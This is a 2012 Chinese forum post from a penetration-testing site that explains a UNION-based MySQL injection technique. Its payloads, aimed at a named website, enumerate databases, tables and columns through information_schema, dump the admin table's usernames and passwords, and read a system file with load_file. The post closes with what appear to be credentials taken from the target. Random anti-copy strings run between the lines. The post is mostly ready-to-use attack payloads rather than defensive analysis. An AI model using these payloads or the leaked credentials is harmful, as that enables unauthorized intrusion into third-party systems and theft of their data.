中国网络渗透测试联盟
标题:
mysql注入高效方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:37
标题:
mysql注入高效方法
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
: i6 |4 @- U- O. S3 }1 C
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
5 l. M1 m( g5 U( L
6 N/ F, A( v# J1 z0 g. g
1 F* e' l3 E$ Q: h% S9 ?
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
# P) u6 @4 d) K: o. j; m Y( {
! n9 V" F7 E! c: t" w: [
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
: K7 l( o) I3 E1 e" }9 w3 K
- o, ?/ c" ]0 D
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
; b, v2 X1 g4 u. W+ g# D( @
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
2 e. B. r4 x6 {' l p8 `3 a! M- ?
6 J+ Y/ @( _6 O
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
( s! E7 ^* e l
6 |5 k6 b8 I0 f* x' d3 G4 N
读出所有库:
1 ?/ ]! Z8 D! E: j7 M6 J1 v
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
* [9 [: @2 g ?5 h9 d
+ ]2 z$ m7 B! O& A
; v, @8 U2 _* F, n9 e: _
% J I7 o' `3 S. L
读出所有表:
& O) p8 ~% S$ P0 [0 \
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
7 A: P6 A) V0 n4 ]* [: L% z
* E& B* ?) T: N8 P O) R/ M! X4 K* R; L
读出所有表字段:
5 s1 _, d$ r8 X
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
; H% q, a8 x; j& Z
*/ (97,100,109,105,110)为admin的ascii码 依次类推
1 Q' `6 I! j4 P8 o& Q' C5 Y' P, E) o
) M8 n# t, E7 Y- g5 G2 r
读出所有表字段里的内容:
" n% W% r! f0 @' R
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
' {3 V' l; ?8 ^' u& e+ O; t" r; ^
7 y" u; v0 t7 U4 `8 O
; _0 {: o! j% l0 j4 v8 H! o, b7 E
' j8 I, i0 \7 i
2 K; ?) T4 {2 \* s' {1 X! \' k/ M- a% `
: e- Q1 {7 j& M7 ~% b
) O# |4 F/ g5 o4 M
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
; _( y( G J8 S8 r# T: r: M
$ q2 \4 W4 D, ] s8 g. n
2 ]8 l0 V' `+ G- x# u c* `
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
+ i' f6 C; y, c5 s) }% y! a; C
- P& s" w* z1 i$ U, j' l+ T' \
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
v+ x% n9 w- p0 B
( `. ]' X, r a$ z8 r" O
( G% t; @$ S7 l' R- }$ N1 g, p2 E4 L
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
3 E! a4 A& q, ^. `$ d
+ X2 W. w$ W3 V# Q- m+ D
3 f+ u% r7 p. G* _. }
webmaster:dzb521123,simlab:simadmin20043233
. t; }& ^: h t
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2